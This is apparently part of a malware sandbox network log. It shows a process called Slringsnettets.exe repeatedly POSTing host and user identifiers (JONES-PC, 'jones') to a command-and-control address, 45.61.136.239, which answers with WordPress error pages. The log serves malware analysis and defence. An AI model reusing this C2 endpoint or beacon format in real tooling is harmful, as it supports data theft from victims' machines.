Jul 4, 2024 08:22:54.832984924 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:22:54.832997084 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:22:54.833014965 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:22:54.833028078 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:22:54.833045006 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:22:54.833276033 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:22:54.833287001 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:22:54.945888996 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:22:54.950915098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:22:57.945275068 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:22:55 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:22:57.945314884 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:22:57.945329905 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:22:57.945406914 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:22:57.945420980 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:22:57.945564985 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:22:57.945578098 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:22:57.945679903 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:22:57.945738077 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:22:57.945775032 CEST	224	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:22:58.321813107 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:22:58.328936100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:03.020411015 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:22:58 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:03.020422935 CEST	224	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
Jul 4, 2024 08:23:03.020565987 CEST	1236	IN	Data Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
Jul 4, 2024 08:23:03.020577908 CEST	1236	IN	Data Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.ge
Jul 4, 2024 08:23:03.020600080 CEST	1236	IN	Data Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 Data Ascii: ion(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</scrip
Jul 4, 2024 08:23:03.020613909 CEST	672	IN	Data Raw: 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 Data Ascii: ffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-them
Jul 4, 2024 08:23:03.020889044 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:03.020899057 CEST	224	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
Jul 4, 2024 08:23:03.020919085 CEST	1236	IN	Data Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
Jul 4, 2024 08:23:03.021054983 CEST	224	IN	Data Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:03.170212984 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:03.176641941 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:06.268377066 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:03 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
